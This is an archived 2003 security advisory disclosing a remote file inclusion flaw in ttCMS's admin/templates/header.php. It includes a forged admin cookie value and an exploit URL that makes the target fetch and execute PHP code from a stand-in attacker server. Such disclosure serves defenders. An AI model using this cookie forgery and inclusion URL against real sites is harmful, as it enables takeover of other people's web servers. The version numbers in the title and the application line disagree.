Advisory name: Remote code execution in ttCMS 2.2.0/2.2.1
Application: ttCMS v2.3 (and older versions)
Vendor: www.ttcms.com
Status: Vendor was contacted but didn't reply - after posting about another
hole on his forums, my account was banned
Impact: Attacker can execute arbitrary php code
Platform(s): Unix
Technical description:
----------------------
Everybody can inject PHP code in ttCMS through the file "header.php"
which can be found in the directory admin/templates/
header.php:
------------------------------------------
(Line #002) if ($HTTP_COOKIE_VARS["ttcms_user_admin"] > 0) {
(Line #003) include_once("$admin_root/templates/header.inc.php");
(Line #004) } else {
(Line #005) header("Location: $admin_root_url/login.php");
(Line #006) exit;
(Line #007) }
------------------------------------------
all you have to do is to send a fake cookie containing
------------------------------------------
ttcms_user_admin=1
------------------------------------------
(this can easily be done by using a tool like Proxomitron or
Anonymity4Proxy)
In order to exploit this vulnerability, you have to create a
file "templates/header.inc.php" on your own webserver,
which contains the code you want to execute on the target-system.
If you now call the file "header.php" like this:
------------------------------------------
http://target/admin/templates/header.php?admin_root=http://yourserver/
------------------------------------------
the code in "templates/header.inc.php" on your own webserver will be
injected. (of course, PHP Execution must be disabled on your machine or
you must use a ftp-Server to store the file you want to inject)
Recommendations:
----------------
Run ttCMS on a secure environment.
Disable register_globals in php.ini
Update to a newer version of ttCMS (currently, none exists)
--
+++ GMX - Mail, Messaging & more http://www.gmx.net +++
Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
This archive was generated by hypermail 2b30 : Sat May 17 2003 - 13:06:03 PDT